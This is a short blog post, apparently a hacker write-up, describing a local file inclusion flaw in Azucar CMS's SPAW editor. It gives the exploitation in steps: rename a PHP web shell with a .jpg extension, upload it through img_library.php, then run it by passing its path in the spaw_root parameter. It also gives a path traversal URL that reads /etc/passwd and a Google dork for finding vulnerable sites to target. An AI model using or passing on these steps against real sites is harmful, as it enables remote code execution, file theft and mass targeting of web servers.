Azucar_cms had a typical bug called LFI (local file inclusion).
The bug was on:
include $spaw_root.'config/spaw_control.config.php'; in cms_estable/lib/spaw/spaw_control.class.php include $spaw_root.'class/util.class.php'; in cms_estable/lib/spaw/spaw_control.class.php include $spaw_root.'class/toolbars.class.php'; in cms_estable/lib/spaw/spaw_control.class.php include $spaw_root.'class/lang.class.php'; in cms_estable/lib/spaw/spaw_control.class.phpLet me show the trick:
1 – Rename your php-shell.txt (you need one before start) in phpshell.php.jpg
2 – For default you have access in img_library.php for upload a file, so you can upload your phpshell.php.jpg, this is the real directory:
http://www.victim.com/lib/spaw/dialogs/img_library.phpThe Question is, how can I call the php-shell? Here we are:
http://www.victim.com/lib/spaw/spaw_control.class.php?spaw_root=../../imagenes_cont/articulos/phpshell.php.jpgAnother trick for show you the password’file on the server:
http://www.victim.com/lib/spaw/spaw_control.class.php?spaw_root=../../../../../etc/passwdThe dork for find it on google was:
allinurl:html/sitio/I never verified if the new versions are patched
Nessun commento:
Posta un commento